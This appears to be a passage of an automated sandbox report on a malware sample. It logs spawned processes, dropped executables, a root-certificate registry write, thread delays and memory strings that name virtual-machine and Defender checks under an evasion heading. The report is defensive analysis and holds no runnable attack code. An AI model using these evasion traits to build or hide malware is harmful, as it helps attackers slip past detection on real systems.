Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX (70 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (99 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process information set: NOOPENFILEERRORBOX (48 identical entries)
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX (10 identical entries)
                        Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_17-79137
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: 1F817500000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: 1F830FD0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1810000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3220000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 5220000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 79B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 7530000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 95F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: A5F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: B0D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: C210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: D210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: E210000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: E840000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 8DB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 7B70000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: F840000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: CC10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 16_2_00401B4B
                        Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 300000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599822
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599671
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599031
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598667
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598561
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598417
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598276
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598136
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597649
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597527
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597379
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596941
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596592
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596447
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595691
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595571
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595412
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595046
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594907
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592816
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592633
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592169
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 590906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 590760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 590593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 590390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 590109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 589858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 589672
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 589430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 589156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 588734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 588468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 587531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 585843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 585500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 585156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 584875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 584684
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 584373
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 584181
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 583984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 583788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 583625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 583281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 583093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 582906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 582593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 582125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 581828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 581515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 581234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 580962
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 580777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 580553
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 580078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 579764
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 579608
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 579418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 579281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579047
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576718
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 574890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 573625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572172
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 571250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 569531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 565328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 564625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 563703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 562890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 560609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 559609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 558734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 557781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 556687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 555359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 554500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 553687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 550154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 549123
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 548388
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 547285
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 546625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 545943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 544442
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 543574
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 542777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 541993
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540668
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540261
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 539466
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537716
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537483
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537249
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536944
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536694
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536376
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535747
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535508
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535314
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 534399
                        Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 5162
                        Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1052
